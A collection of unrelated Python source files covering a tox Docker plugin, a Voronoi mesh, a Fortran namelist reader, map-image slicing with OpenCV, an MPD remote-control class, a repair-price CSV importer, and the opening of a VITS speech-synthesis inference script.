if hc_interval:
healthcheck["interval"] = hc_interval
if hc_timeout:
healthcheck["timeout"] = hc_timeout
if hc_start_period:
healthcheck["start_period"] = hc_start_period
if hc_retries:
healthcheck["retries"] = hc_retries
if healthcheck == {}:
healthcheck = None
ports = {}
for port_mapping in container_config.get("ports", []):
host_port, container_port_proto = _validate_port(port_mapping)
existing_ports = set(ports.get(container_port_proto, []))
existing_ports.add(host_port)
ports[container_port_proto] = list(existing_ports)
links = {}
for other_container_name, alias in container_config.get("links", {}).items():
other_container = envconfig._docker_containers[other_container_name]
links[other_container.id] = alias
image = container_config["image"]
environment = container_config.get("environment", {})
action.setactivity("docker", f"run {image!r} (from {container_name!r})")
with action:
container = docker.containers.run(
image,
detach=True,
environment=environment,
healthcheck=healthcheck,
labels={"tox_docker_container_name": container_name},
links=links,
name=container_name,
ports=ports,
publish_all_ports=len(ports) == 0,
mounts=container_config.get("mounts", []),
)
envconfig._docker_containers[container_name] = container
container.reload()
for container_name, container in envconfig._docker_containers.items():
image = container.attrs["Config"]["Image"]
if "Health" in container.attrs["State"]:
action.setactivity(
"docker", f"health check {image!r} (from {container_name!r})"
)
with action:
while True:
container.reload()
health = container.attrs["State"]["Health"]["Status"]
if health == "healthy":
break
elif health == "starting":
time.sleep(0.1)
elif health == "unhealthy":
# the health check failed after its own timeout
stop_containers(venv)
msg = f"{image!r} (from {container_name!r}) failed health check"
venv.status = msg
raise HealthCheckFailed(msg)
gateway_ip = _get_gateway_ip(container)
for containerport, hostports in container.attrs["NetworkSettings"][
"Ports"
].items():
if hostports is None:
# The port is exposed by the container, but not published.
continue
for spec in hostports:
if spec["HostIp"] == "0.0.0.0":
hostport = spec["HostPort"]
break
else:
continue
envvar = escape_env_var(f"{container_name}_HOST")
venv.envconfig.setenv[envvar] = gateway_ip
envvar = escape_env_var(f"{container_name}_{containerport}_PORT")
venv.envconfig.setenv[envvar] = hostport
@hookimpl
def tox_runtest_post(venv):
stop_containers(venv)
def stop_containers(venv):
envconfig = venv.envconfig
if not envconfig.docker:
return
config = envconfig.config
action = _newaction(venv, "docker")
for container_name, container in envconfig._docker_containers.items():
container_config = config._docker_container_configs[container_name]
if container_config["stop"]:
action.setactivity(
"docker", f"remove '{container.short_id}' (from {container_name!r})"
)
with action:
container.remove(v=True, force=True)
else:
action.setactivity(
"docker",
f"leave '{container.short_id}' (from {container_name!r}) running",
)
with action:
pass
@hookimpl
def tox_addoption(parser):
# necessary to allow the docker= directive in testenv sections
parser.add_testenv_attribute(
name="docker",
type="line-list",
help="Name of docker images, including tag, to start before the test run",
default=[],
)
# command line flag to keep docker containers running
parser.add_argument(
"--docker-dont-stop",
default=[],
action="append",
metavar="CONTAINER",
help=(
"If specified, tox-docker will not stop CONTAINER after the test run. "
"Can be specified multiple times."
),
)
|
<filename>qtree/voronoi.py
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.collections import LineCollection
from scipy.spatial import Voronoi
from qtree.utils import _points_in_poly
class ParticleVoronoiMesh(object):
def __init__(self, positions, deposit_field, bounds):
"""A voronoi mesh generated from particle positions
Parameters
----------
positions : iterable of 2-element iterables
Positions of the particles to be inserted.
deposit_field : iterable, optional
Field to be deposited and pixelized. Must have the same
number of elements as the number of positions.
bounds : 2-element iterable of two-tuples
The coordinates of the lower-left and upper-right corners
of the bounds of the mesh. Particles outside the bounds are
discarded.
"""
positions = np.asarray(positions)
self.num_particles = nparticles = positions.shape[0]
self.bounds = bounds = np.asarray(bounds)
if deposit_field is not None and nparticles != deposit_field.shape[0]:
raise RuntimeError(
"Received %s deposit_field entries but received %s particle "
"positions" % (deposit_field.shape[0], nparticles))
if positions.shape[-1] != 2:
raise RuntimeError(
"Received %sD positions %s but expected 2D positions"
% (positions.shape,))
self.voro = voro = Voronoi(positions)
self.deposit_field = deposit_field
ridge_verts = np.array(voro.ridge_vertices)
ridge_verts = ridge_verts[(ridge_verts != -1).all(axis=-1)]
self.segments = voro.vertices[ridge_verts]
def pixelize(self, image):
"""pixelize the deposit_field onto an image
Parameters
----------
image : 2D array
Image to pixelize onto
"""
image = np.asarray(image)
if len(image.shape) != 2:
raise RuntimeError("Must pixelize onto 2D image")
voro = self.voro
regions = voro.regions
bounds = self.bounds
dx = 1/image.shape[0]
dy = 1/image.shape[1]
xb = bounds[1, 0] - bounds[0, 0] - dx
yb = bounds[1, 1] - bounds[0, 1] - dy
xlin = np.arange(image.shape[0])/(image.shape[0] - 1) * xb + dx/2
ylin = np.arange(image.shape[1])/(image.shape[1] - 1) * yb + dy/2
x, y = np.meshgrid(xlin, ylin)
for i, point_coord in enumerate(voro.points):
region_idx = voro.point_region[i]
region = regions[region_idx]
if -1 in region or len(region) == 0:
continue
vertices = voro.vertices[region]
vx = vertices[:, 0]
vy = vertices[:, 1]
area = 0.5*np.abs(np.dot(vx, np.roll(vy, 1)) -
np.dot(vy, np.roll(vx, 1)))
in_poly = _points_in_poly(vertices, x, y)
image[np.where(in_poly)] = self.deposit_field[i] / area
return image
def plot(self, filename=None):
"""Plot the mesh"""
fig = plt.figure(figsize=(4, 4))
axes = fig.add_axes([.01, .01, .98, .98])
axes.set_aspect('equal')
plt.axis('off')
lc = LineCollection(self.segments, color='k', linewidths=0.5)
axes.add_collection(lc)
positions = self.voro.points
axes.scatter(positions[:, 0], positions[:, 1], s=.2, color='k',
marker='o')
plt.xlim((0, 1))
plt.ylim((0, 1))
if filename is None:
plt.show()
else:
plt.savefig(filename, dpi=400)
|
<filename>tcvx21/grillix_post/components/namelist_reader_m.py
"""
Implementation of a reader for Fortran namelist readers, which can be used to interface with parameter files
"""
from collections import defaultdict
from os import name
from pathlib import Path
import f90nml
from tempfile import NamedTemporaryFile
import fnmatch
def read_fortran_namelist(path: Path):
"""
Fortran namelist reader, using the f90nml module.
If the '+' character is detected in the source file, a temporary file is made
which removes '+'. This prevents a possible error in the namelist reading.
"""
assert path.exists()
with open(path, "r") as file:
contents = file.read()
if "+" in contents:
contents = contents.replace("+", "")
temp_path = Path(NamedTemporaryFile(delete=False).name)
with open(temp_path, "w") as temp_file:
temp_file.write(contents)
namelist = f90nml_read_file(temp_path)
# Remove the temporary file
temp_path.unlink()
else:
namelist = f90nml_read_file(path)
return convert_dict_to_defaultdict_recursive(namelist)
def f90nml_read_file(filename: Path):
"""
Uses the f90nml library to read the namelist, and then returns a defaultdict of the result
"""
namelist = f90nml.read(str(filename)).todict()
return namelist
def convert_dict_to_defaultdict_recursive(input_dict):
"""
Recursively converts all dictionaries, and values which are dictionaries, into defaultdicts
"""
input_dict = defaultdict(list, input_dict)
for key, item in input_dict.items():
if isinstance(item, dict):
input_dict[key] = convert_dict_to_defaultdict_recursive(item)
return input_dict
def convert_params_filepaths(parameter_file_path: Path, params: dict):
"""
Adds parameters in linked namelists to the base parameter dictionary
"""
params_paths = {
"grid_params_path": "params_grid",
"map_params_path": "params_map",
"init_params_path": "params_init",
"trace_params_path": "params_trace",
"tstep_params_path": "params_tstep",
"physmod_params_path": "params_physmod",
"bndconds_params_path": "params_bndconds",
"bufferz_params_path": "params_bufferz",
"floors_params_path": "params_floors",
"multigrid_params_path": "params_multigrid",
"pimsolver_params_path": "params_pimsolver",
"penalisation_params_path": "params_penalisation",
"diags_params_path": "params_diags",
"srcsnk_params_path": "params_srcsnk",
"tempdev_params_path": "params_tempdev",
"neutrals_params_path": "params_neutrals",
"iotrunk_params_path": "params_iotrunk",
}
for key, path in params["params_filepaths"].items():
pointer_filepath = parameter_file_path.parent / path
assert pointer_filepath.exists()
pointer_params = read_fortran_namelist(pointer_filepath)
if key == "equi_init_params_path":
equi_params = fnmatch.filter(pointer_params.keys(), "equi_*_params")
assert len(equi_params) == 1
params[equi_params[0]] = pointer_params[equi_params[0]]
else:
new_key = params_paths[key]
if not new_key in pointer_params.keys():
print(f"No match for {new_key}. Setting to []")
else:
params[new_key] = pointer_params[new_key]
return params
|
import cv2
import numpy as np
import imutils
c = 1
folder = "input4/"
alueet = cv2.imread(folder + 'Yleiskaava.png', 0)
alueet = cv2.threshold(alueet, 127, 255, cv2.THRESH_BINARY_INV)[1] # ensure binary
connectivity = 8
output = cv2.connectedComponentsWithStats(alueet, connectivity, cv2.CV_32S)
kernel = np.ones((5,5), np.uint8)
korttelit = cv2.imread(folder + 'Korttelit.png', 0)
korttelit = cv2.threshold(korttelit, 127, 255, cv2.THRESH_BINARY_INV)[1] # ensure binary
#korttelit_mask = cv2.dilate(korttelit, kernel, iterations=5)
#korttelit_mask = cv2.erode(korttelit_mask, kernel, iterations=3)
kadut = cv2.imread(folder + 'Tavoiteverkko.png', 0)
kadut_mask = cv2.threshold(kadut, 127, 255, cv2.THRESH_BINARY_INV)[1]
detailed_kadut = cv2.imread(folder + 'Katualueet.png', 0)
detailed_kadut = cv2.threshold(detailed_kadut, 127, 255, cv2.THRESH_BINARY_INV)[1]
#kadut_mask = cv2.erode(kadut_mask, kernel, iterations=1)
tehokkuus = cv2.imread(folder + 'Tehokkuus.png', 0)
ret = output[0]
# The second cell is the label matrix
labels = output[1]
# The third cell is the stat matrix
stats = output[2]
identifier = 0
for label in range(1,ret):
x = stats[label, cv2.CC_STAT_LEFT]
y = stats[label, cv2.CC_STAT_TOP]
w = stats[label, cv2.CC_STAT_WIDTH]
h = stats[label, cv2.CC_STAT_HEIGHT]
if(w < 10 or h < 10): continue
mask = np.zeros(alueet.shape, dtype=np.uint8)
mask[labels == label] = 255
crop = mask[y:y+h,x:x+w]
crop = cv2.resize(crop, (0,0), fx=c, fy=c)
newH,newW = crop.shape
if(newH > 512 or newW > 512):
continue
#padding = (newH - 512) // 2
#crop = crop[padding:padding+512,:]
green = np.zeros((512,1024), dtype=np.uint8)
blue = np.zeros((512,1024), dtype=np.uint8)
red = np.zeros((512,1024), dtype=np.uint8)
offsetX = (512 - newW) // 2
offsetY = (512 - newH) // 2
#print("x " + str(x) + " width " + str(newW) + " offset X " + str(offsetX))
#print("y " + str(y) + " height " + str(newH) + " offset Y " + str(offsetY))
green[offsetY:offsetY+newH, offsetX:offsetX+newW] = crop
yos = y-offsetY
xos = x-offsetX
korttelit_slice = korttelit[yos:yos+(512/c), xos:xos+(512/c)]
korttelit_slice = cv2.resize(korttelit_slice, (0,0), fx=c, fy=c)
kH, kW = korttelit_slice.shape
korttelit_slice = cv2.bitwise_and(korttelit_slice,korttelit_slice,mask = green[0:kH, 0:kW])
#blue[0:kH, 512:(512 + kW)] = korttelit_slice
#red[0:kH, 512:(512 + kW)] = korttelit_slice
korttelit_mask_slice = korttelit[yos:yos+(512/c), xos:xos+(512/c)]
korttelit_mask_slice = cv2.resize(korttelit_mask_slice, (0,0), fx=c, fy=c)
korttelit_mask_slice = cv2.bitwise_and(korttelit_mask_slice,korttelit_mask_slice,mask = green[0:kH, 0:kW])
korttelit_mask_slice = cv2.dilate(korttelit_mask_slice, kernel, iterations=5)
komsH, komsW = korttelit_mask_slice.shape
if(komsW != 512 or komsH != 512): continue
korttelit_mask_slice_2x = np.zeros((512,1024), dtype=np.uint8)
korttelit_mask_slice_2x[0:512, 0:512] = korttelit_mask_slice
# also add green channel to output so we have RGB
#(before added just blue and red, and have to do it here)
green = cv2.bitwise_and(green,green,mask = korttelit_mask_slice_2x)
green[0:kH, 512:(512 + kW)] = korttelit_slice
red[0:kH, 512:(512 + kW)] = korttelit_slice
blue[0:kH, 512:(512 + kW)] = korttelit_slice
kadut_mask_slice = kadut_mask[yos:yos+(512/c), xos:xos+(512/c)]
kadut_mask_slice = cv2.resize(kadut_mask_slice, (0,0), fx=c, fy=c)
kmsH, kmsW = kadut_mask_slice.shape
if(kmsW != 512 or kmsH != 512): continue
kadut_slice = kadut[yos:yos+(512/c), xos:xos+(512/c)]
kadut_slice = cv2.resize(kadut_slice, (0,0), fx=c, fy=c)
ksH, ksW = kadut_slice.shape
detailed_kadut_slice = detailed_kadut[yos:yos+(512/c), xos:xos+(512/c)]
detailed_kadut_slice = cv2.resize(detailed_kadut_slice, (0,0), fx=c, fy=c)
detailed_kadut_slice_masked = cv2.bitwise_and(detailed_kadut_slice, detailed_kadut_slice, mask=(255-green[0:512, 0:512]))
dksH, dksW = detailed_kadut_slice_masked.shape
#print("kmsH " + str(kmsH) + " kmsW " + str(kmsW))
#print("ksH " + str(ksH) + " ksW " + str(ksW))
combined = cv2.add(kadut_mask_slice,detailed_kadut_slice_masked)
blue[0:512, 0:512] = detailed_kadut_slice_masked
red[0:512, 0:512] = kadut_mask_slice
#blue[0:512, 512:1024] = cv2.bitwise_and(detailed_kadut_slice, detailed_kadut_slice, mask=(green[0:512, 0:512]))
#blue[0:512, 512:1024] = cv2.add(kadut_mask_slice,detailed_kadut_slice)
#cv2.bitwise_and(detailed_kadut_slice, green[0:512, 0:512])
#tehokkuus_slice = tehokkuus[yos:yos+(512/c), xos:xos+(512/c)]
#tehokkuus_slice = cv2.resize(tehokkuus_slice, (0,0), fx=c, fy=c)
#tsH, tsW = tehokkuus_slice.shape
#cv2.imwrite("out/" + str(identifier) + "_t.jpg", tehokkuus_slice)
#red[0:512, 0:512] = tehokkuus_slice
#green = cv2.multiply(1.0 - bigmask, green)
#kadut_slice = cv2.multiply(kadut_mask_slice)
#kadut_slice = cv2.bitwise_and(kadut_slice,kadut_slice,mask = kadut_mask_slice)
#green[0:kH, 0:kW] = kadut_slice
white = np.sum(korttelit_slice == 255)
if(white < 1): continue
out=cv2.merge((blue,green,red))
cv2.imwrite("out/" + str(identifier) + ".png", out)
print(identifier)
cv2.imwrite("out/" + str(identifier) + "_dk.png", detailed_kadut[yos:yos+(512/c), xos:xos+(512/c)])
cv2.imwrite("out/" + str(identifier) + "_dks.png", detailed_kadut_slice)
cv2.imwrite("out/" + str(identifier) + "_dksm.png", detailed_kadut_slice_masked)
#cv2.imwrite("out/" + str(identifier) + "_kms.jpg", kadut_mask_slice)
#cv2.imwrite("out/" + str(identifier) + "_bm.jpg", bigmask)
#cv2.imwrite("out/" + str(identifier) + "_koms.jpg", korttelit_mask_slice)
identifier += 1
#cv2.waitKey(0)
'''
def imshow_components(labels):
# Map component labels to hue val
label_hue = np.uint8(179*labels/np.max(labels))
blank_ch = 255*np.ones_like(label_hue)
labeled_img = cv2.merge([label_hue, blank_ch, blank_ch])
# cvt to BGR for display
labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_HSV2BGR)
# set bg label to green
labeled_img[label_hue==0] = 0
#cv2.imshow('2.png', labeled_img)
cv2.imwrite("labeled2.jpg", labeled_img)
#cv2.waitKey()
'''
#imshow_components(labels) |
from typing import Callable, Optional, List, Set
import logging
import subprocess
from pathlib import Path
from readchar import key
import appdirs
import yaml
from . import Remote, MuteContext, vanity
from .backend import Client
from .library import Album
from .speech import Speech, Beep, conjoin
class DenonRC1223(Remote):
def __init__(self, client: Client):
super().__init__(client)
self._beep = Beep(hz=300, duration=0.2)
self._repeat_char = "+"
self._flush_seconds = 0.25
self._seek_seconds = 30
self._genres = {
"1": [
"Classical",
],
"2": [
"Acoustic",
"Soft Rock",
"R&B",
],
"3": [
"Folk",
"Indie Folk",
"Indie",
"Indie Rock",
"Indie Pop",
"Worldbeat",
"Blues",
"Celtic",
],
"4": [
"Hip-Hop",
"Rap",
"Reggae",
],
"5": [
"Jazz",
"Jazz Pop",
"Instrumental",
],
"6": [
"Hard Rock",
"Punk Rock",
"Nu Metal",
"Ska",
"Grunge",
"Metal",
"Alternative Metal",
],
"7": [
"Alternative Rock",
"Blues Rock",
"Classic Rock",
"Folk Rock",
"Progressive Rock",
"Indie Rock",
"Post Grunge",
"Country",
"Country Rock",
"Latin",
"Pop Rock",
],
"8": [
"Electronic",
"Dance",
"Disco",
"House",
],
"9": [
"Religious",
"Gospel",
"Soul",
],
"0": [
"Pop",
"Pop Punk",
"Funk",
],
}
self._vanity_idx = 0
self._actions = {
#
# System controls:
"~": self.power,
#
# Amp controls:
"=": self.volume,
"-": self.volume,
#
# Playback controls:
" ": self.toggle_playback,
"<": self.prev,
">": self.next,
"/": self.stop,
",": self.seek_rewind,
".": self.seek_forward,
#
# Direction pad:
"\r": self.enter,
"\n": self.enter,
"b": self.back,
key.UP: self.up,
key.LEFT: self.left,
key.DOWN: self.down,
key.RIGHT: self.right,
#
# Center remote:
"i": self.info,
"s": self.source,
"q": self.queue,
"m": self.mode,
"t": self.setup,
#
# Number pad:
"1": self.number("1"),
"2": self.number("2"),
"3": self.number("3"),
"4": self.number("4"),
"5": self.number("5"),
"6": self.number("6"),
"7": self.number("7"),
"8": self.number("8"),
"9": self.number("9"),
"0": self.number("0"),
"+": self.number_plus,
#
# Lower row:
"l": self.clear,
"r": self.random,
"p": self.repeat,
"d": self.dimmer,
}
def load_config(self):
filepath = Path(appdirs.user_config_dir("mpd-remote")) / "denon_rc1223.yaml"
if filepath.is_file():
logging.info(f"Loading configuration file: {filepath}")
with filepath.open("r") as file:
config = yaml.safe_load(file)
if "genres" in config:
self._genres = config["genres"]
if "flush_seconds" in config:
self._flush_seconds = config["flush_seconds"]
def _button(self, name: str):
logging.info(f"Button: {name}")
def _search_mode(self) -> str:
return vanity.MODES[self._vanity_idx]
def print_genre_groups(self):
"""Print the genre mapping along with how many albums are in each genre."""
all_genres: List[str] = self._client.genres()
seen_genres: Set[str] = set()
padding = max([len(x) for x in all_genres])
def analyze_genres(genres):
total: Set[str] = set()
for gnr in genres:
albums = self._client.library.albums_with_genres([gnr])
num = len(albums)
print(" + {:<{}} {}".format(gnr, padding, num))
seen_genres.add(gnr)
for alb in albums:
total.add(alb)
print(" --{:->{}} {}".format(">", padding, len(total)))
for gid, genres in self._genres.items():
print(f"Number {gid}:")
analyze_genres(genres)
unmapped = [g for g in all_genres if g not in seen_genres]
print("Unmapped:")
analyze_genres(unmapped)
self.flush_stdout()
def prefetch(self):
"""Prefetch audio speech segments for reduced waiting times (roughly 30
MB for a large library)."""
# Prefetch common terms (these will change from time to time):
logging.info("Prefetching: common terms")
for text in [
"OK",
"Back.",
"Ready.",
"Not implemented yet.",
"Use directional buttons.",
"Sorry, an error occurred.",
#
# Help: enter()
"Press a button for help.",
"Sorry, this button is undocumented.",
"Sorry, this input event is unmapped.",
#
# Power menu: power()
"Power menu.",
"Update library?",
"Updating library.",
"Restart system?",
"Restarting system.",
"Shutdown system?",
"Shutting down system.",
#
# Setup menu: setup()
"Setup menu.",
"consume: on",
"consume: off",
"random: on",
"random: off",
"repeat: on",
"repeat: off",
"single: on",
"single: off",
"single: one shot",
"replay-gain: off",
"replay-gain: auto",
"replay-gain: track",
"replay-gain: album",
#
# Information: info(), source(), queue()
"Currently playing:",
"Current playlist is empty.",
"Current playlist has:",
#
# Searching: down()
"Search albums.",
"Searching with:",
"search mode: strict",
"search mode: linear",
"search mode: fuzzy",
"Use vanity numbers to search.",
"Use numbers and directional buttons.",
]:
Speech(text).prefetch()
# Prefetch help texts:
logging.info("Prefetching: help texts")
for key in self._actions.keys():
action = self._actions[key]
if action.__doc__:
Speech(action.__doc__).prefetch()
# Prefetch numbers up to 100:
logging.info("Prefetching: numbers")
for num in range(100):
Speech(f"{num}").prefetch()
# Prefetch all album paths:
logging.info("Prefetching: album paths")
for alb in self._client.library.albums.keys():
Speech(alb).prefetch()
def power(self):
"""Update, restart or shutdown system."""
self._button("POWER")
def power_update(ctx):
ctx.say("Updating library.")
self._client.update()
ctx.say("Done.")
def power_restart(ctx):
ctx.say("Restarting system.")
subprocess.run(["reboot"])
def power_shutdown(ctx):
ctx.say("Shutting down system.")
subprocess.run(["poweroff"])
with self.mute_context() as ctx:
self.navigate_menu(
ctx,
[
("Update library?", power_update),
("Restart system?", power_restart),
("Shutdown system?", power_shutdown),
],
title="Power menu.",
)
def volume(self):
"""Beep during volume changes."""
if not self._client.is_playing():
self._beep.play()
def toggle_playback(self):
"""Toggle playback."""
self._button("PLAY/PAUSE")
self._client.toggle_playback()
def play(self):
"""Start playback."""
self._button("PLAY")
self._client.play()
def pause(self):
"""Pause playback."""
self._button("PAUSE")
self._client.pause()
def prev(self):
"""Previous track."""
self._button("PREV")
self._client.prev()
def next(self):
"""Next track."""
self._button("NEXT")
self._client.next()
def stop(self):
"""Stop playback."""
self._button("STOP")
self._client.stop()
def seek_rewind(self):
"""Rewind track."""
self._button("REWIND")
self._client.seek_rewind(self._seek_seconds)
def seek_forward(self):
"""Fast-forward track."""
self._button("FORWARD")
self._client.seek_forward(self._seek_seconds)
def enter(self):
"""Help. In menus: selecting entries."""
self._button("ENTER")
with self.mute_context() as ctx:
self.help_menu(ctx)
def back(self):
"""Nothing. In menus: go back."""
self._button("BACK")
status, _ = self._client.status()
if status["state"] == "play":
pass
else:
with self.mute_context() as ctx:
ctx.say("Ready.")
def up(self):
"""Search playlists by name. In menus: previous entry."""
self._button("UP")
with self.mute_context() as ctx:
ctx.say("Not implemented yet.")
pass
def left(self):
"""Nothing. In menus: go back."""
self._button("LEFT")
def right(self):
"""Nothing. In menus: select or toggle."""
self._button("RIGHT")
def down(self):
"""Search albums by path. In menus: next entry."""
self._button("DOWN")
play: Optional[Album] = None
def toggle_vanity(ctx: MuteContext):
self._vanity_idx = (self._vanity_idx + 1) % len(vanity.MODES)
return ctx.say_async(f"search mode: {self._search_mode()}")
def extend_results(ctx):
if ctx.generator is None:
return
try:
item = next(ctx.generator)
except StopIteration:
pass
else:
ctx.results.append(item)
ctx.index += 1
def say_current(ctx, say_initial: bool = False):
if ctx.index >= 0:
if ctx.index > 0 or say_initial:
ctx.player = ctx.say_async(f"{ctx.index+1}")
result = Speech(str(ctx.results[ctx.index].path)).prefetch()
ctx.player.wait()
return result.play_async()
return ctx.say_async("0")
def new_search(ctx, query: str):
ctx.results = []
logging.info(f"Searching vanity: {query}")
ctx.generator = ctx.api.library.search_vanity(
query, mode=self._search_mode()
)
ctx.index = -1
extend_results(ctx)
if ctx.player:
ctx.player.wait()
return say_current(ctx)
with self.mute_context() as ctx:
# Set up context:
ctx.generator = None
ctx.results: List[Album] = []
ctx.index: int = -1
ctx.player: subprocess.Popen = ctx.say_async("Search albums.")
# Build query and update results:
query: str = ""
while True:
self.flush_stdin(self._flush_seconds)
char = self.prompt_stdin()
logging.info(f"Kill process: {ctx.player.pid}")
ctx.player.terminate()
ctx.player.wait()
if char in self.BACK_KEYS:
ctx.say("Back.")
break
elif (char >= "0" and char <= "9") or char in ["l", "m", key.LEFT]:
if char in ["l", key.LEFT]:
query = query[:-1]
elif char == "m":
ctx.player = toggle_vanity(ctx)
else:
query += char
ctx.player = new_search(ctx, query)
elif char == "i":
if query != "":
ctx.player = ctx.say_async("Searching with:")
target = Speech(f"{query}").prefetch(cache=False)
ctx.player.wait()
target.play()
else:
ctx.player = ctx.say_async("Use vanity numbers to search.")
elif char == key.DOWN:
if ctx.index + 1 >= len(ctx.results):
extend_results(ctx)
else:
ctx.index += 1
ctx.player = say_current(ctx)
elif char == key.UP:
if ctx.index > 0:
ctx.index -= 1
ctx.player = say_current(ctx, say_initial=True)
elif char in self.ENTER_KEYS:
play = ctx.results[ctx.index]
ctx.say("OK")
break
else:
ctx.player = ctx.say_async("Use numbers and directional buttons.")
if play is not None:
logging.info(f"Playing album: {play.path}")
self._client.play_album(play)
def info(self):
"""Speak title and artist of current track."""
self._button("INFO")
with self.mute_context() as ctx:
if ctx.status["playlistlength"] == "0":
ctx.say("Current playlist is empty.")
return
player = ctx.say_async("Currently playing:")
current = ctx.current()
assert current is not None
target = Speech(f"{current.title} by {current.artist}").prefetch(
cache=False
)
player.wait()
target.play()
def source(self):
"""Speak album and artist of current track."""
self._button("SOURCE")
with self.mute_context() as ctx:
if ctx.status["playlistlength"] == "0":
ctx.say("Current playlist is empty.")
return
player = ctx.say_async("Currently playing:")
current = ctx.current()
assert current is not None
target = Speech(f"{current.album} by {current.albumartist}").prefetch()
player.wait()
target.play()
def queue(self):
"""Speak queue length and duration."""
self._button("QUEUE")
with self.mute_context() as ctx:
if ctx.status["playlistlength"] == "0":
ctx.say("Current playlist is empty.")
return
player = ctx.say_async("Current playlist has:")
tracks = ctx.status["playlistlength"]
minutes = round(sum([t.duration for t in ctx.playlist]) / 60)
target = Speech(f"{tracks} tracks summing {minutes} minutes.").prefetch(
cache=False
)
player.wait()
target.play()
def mode(self):
"""Reserved."""
self._button("MODE")
with self.mute_context() as ctx:
ctx.say("Not implemented yet.")
pass
def setup(self):
"""Modify playback settings."""
self._button("SETUP")
def option(key: str):
if key == "single":
info = {"0": "off", "1": "on", "oneshot": "one shot"}
toggle = {"0": "1", "1": "oneshot", "oneshot": "0"}
else:
info = {"0": "off", "1": "on"}
toggle = {"0": "1", "1": "0"}
return (
lambda ctx: f"{key}: {info[ctx.status[key]]}",
lambda ctx: ctx.api.toggle(key, toggle[ctx.status[key]]) or True,
)
def option_replay_gain():
return (
lambda ctx: f"replay-gain: {ctx.api.status_replay_gain()}",
lambda ctx: ctx.api.toggle_replay_gain() or True,
)
with self.mute_context() as ctx:
self.navigate_menu(
ctx,
[
option("consume"),
option("random"),
option("repeat"),
option("single"),
option_replay_gain(),
],
title="Setup menu.",
)
def number(self, num: str) -> Callable[[], None]:
"""Create a function to play a random album from a list of genres."""
genres = self._genres[num]
button = f"{num} {vanity.VANITY_MAP[num]}"
def func():
self._button(button)
self._repeat_char = self._input_char
self._client.play_random(genres)
# Set the documentation on the function so that the help function works.
func.__doc__ = f"Play {conjoin('or', genres or ['random'])} album."
return func
def number_plus(self):
"""Play recent album."""
self._button("+10 a/A")
self._client.play_recent()
self._repeat_char = self._input_char
def clear(self):
"""Clear playlist."""
self._button("CLEAR")
self._client.clear()
def random(self):
"""Play random album."""
self._button("RANDOM")
self._actions["0"]()
def repeat(self):
"""Repeat last number choice."""
self._button("REPEAT")
self._actions[self._repeat_char]()
def dimmer(self):
"""Reserved."""
self._button("DIMMER")
with self.mute_context() as ctx:
ctx.say("Not implemented yet.")
pass
|
import csv
import decimal
import logging
import typing
from io import StringIO
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import FlushError
from flask import flash
from project.server import db
from project.server.models import Manufacturer, DeviceSeries, Device, Color, Repair
logger = logging.getLogger(__name__)
def import_repairs(repair_file_content: str) -> typing.Tuple[int, str]:
string = StringIO(repair_file_content)
csv_reader = csv.reader(string, delimiter=',')
headers = next(csv_reader)
if not len(headers) == 6:
return False, "Es werden genau 6 Spalten benötigt. Herstelle,Serie,Gerät,Farbe,Reparatur,Preis (in €)"
counter = 0
for manufacturer, series, device, repair, color_string, price_str in csv_reader:
try:
manufacturer = manufacturer_create_or_get(manufacturer)
series = series_create_or_get(manufacturer, series)
device = device_create_or_get(series, device)
colors = get_colors(color_string)
price = str_to_dec(price_str)
if not colors and color_string:
return False, f"Farbe {color_string} existiert nicht im System. Bitte wähle eine existierende! Achte darauf, dass der *internal_name* als Name erwartet wird."
if price is None:
return False, f"Der Preis '{price_str}' scheint kein valider Preis zu sein."
repair = create_new_or_skip_existing(repair, device, price)
repair.device.colors = colors
repair.save()
if repair:
counter += 1
except (IntegrityError, FlushError,) as e:
logger.error(e)
print(e)
db.session.rollback()
continue
if counter == 0:
return 0, "Keine neuen Reparturen gefunden"
return counter, ""
def str_to_dec(price: str) -> typing.Optional[decimal.Decimal]:
try:
return decimal.Decimal(price.strip(' "'))
except Exception:
return None
def create_new_or_skip_existing(rep_name: str, device: Device, price: decimal.Decimal) -> typing.Optional[Repair]:
repairs: typing.List[Repair] = list(filter(lambda rep: rep.name == rep_name, device.repairs))
if not repairs:
return Repair.create(name=rep_name, device=device, price=price)
# Repair does already exist:
rep = repairs[0]
if rep.price != price:
flash(f"Updating {rep}: Setting price from {rep.price} to {price}")
else:
logger.info(f"Skipping {rep} because it exists.")
return rep
def manufacturer_create_or_get(manufacturer: str) -> Manufacturer:
manu = Manufacturer.query.filter(Manufacturer.name == manufacturer).first()
if not manu:
manu = Manufacturer.create(name=manufacturer, activated=True)
return manu
def series_create_or_get(manufacturer: Manufacturer, series_name: str) -> DeviceSeries:
series = DeviceSeries.query.filter(DeviceSeries.name == series_name).first()
if not series:
series = DeviceSeries.create(manufacturer=manufacturer, name=series_name)
return series
def device_create_or_get(series: DeviceSeries, device_name: str) -> Device:
device = Device.query.filter(Device.name == device_name).first()
if not device:
device = Device.create(series=series, name=device_name)
return device
def get_colors(color: str) -> typing.List[Color]:
colors = color.split(",")
return Color.query.filter(Color.name.in_(color.strip() for color in colors)).all()
|
#!/usr/bin/env python3
import argparse
import logging
import os
import re
import sys
import time
from pathlib import Path
import torch
from vits_train.checkpoint import load_checkpoint
from vits_train.config import TrainingConfig
from vits_train.utils import audio_float_to_int16
from vits_train.wavfile import write as write_wav
_LOGGER = logging.getLogger("vits_train.infer")
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(prog="vits-train.infer")
parser.add_argument("--model-dir", help="Path to model directory")
parser.add_argument(
"--checkpoint", help="Path to model checkpoint (default: best_model.pth)"
)
parser.add_argument(
"--output-dir",
help="Directory to write WAV file(s) (default: current directory)",
)
parser.add_argument(
"--text", action="store_true", help="Input is text instead of phoneme ids"
)
parser.add_argument(
"--csv", action="store_true", help="Input format is id|p1 p2 p3..."
)
parser.add_argument("--noise-scale", type=float, default=0.667)
parser.add_argument("--noise-scale-w", type=float, default=0.8)
parser.add_argument("--length-scale", type=float, default=1.0)
parser.add_argument("--cuda", action="store_true", help="Use GPU for inference")
parser.add_argument(
"--speaker", type=int, help="Speaker id number (multispeaker model only)"
)
parser.add_argument(
"--debug", action="store_true", help="Print DEBUG messages to the console"
)
args = parser.parse_args()
if args.debug:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
_LOGGER.debug(args)
# -------------------------------------------------------------------------
# Convert to paths
if args.model_dir:
args.model_dir = Path(args.model_dir)
